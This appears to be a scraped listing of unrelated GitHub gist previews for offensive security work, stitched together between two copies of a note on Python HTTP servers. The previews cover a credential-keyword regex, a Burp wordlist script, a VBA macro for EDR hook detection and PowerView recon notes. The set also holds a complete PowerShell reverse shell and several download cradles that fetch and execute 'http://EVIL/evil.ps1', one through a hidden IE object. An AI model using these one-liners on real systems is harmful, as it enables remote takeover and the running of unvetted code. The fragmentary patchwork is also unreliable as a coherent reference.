Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000| (?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k |
| import xml.etree.ElementTree as ET | |
| import urllib | |
| import base64 | |
| import math | |
| import sys | |
| import re | |
| # usage: Open Burp, navigate to proxy history, ctrl-a to select all records, right click and "Save Items" as an .xml file. | |
| # python burplist.py burprequests.xml | |
| # output is saved to wordlist.txt |
| Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr | |
| Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr | |
| Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long) | |
| 'VBA Macro that detects hooks made by EDRs | |
| 'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa) | |
| Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer | |
| Dim address As LongPtr |
| # Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html | |
| $client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() |
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
| # Import PowerView into memory without touching disk | |
| # IEX (New-Object Net.WebClient).DownloadString('http://HOST/powerview.ps1') | |
| ################################### | |
| # Hunting for Users | |
| ################################### | |
| # search for administrator groups |
| # NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/) | |
| # has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 | |
| # get all the groups a user is effectively a member of, 'recursing up' | |
| Get-NetGroup -UserName <USER> | |
| # get all the effective members of a group, 'recursing down' | |
| Get-NetGroupMember -GoupName <GROUP> -Recurse | |
| # get the effective set of users who can administer a server |
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |
Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000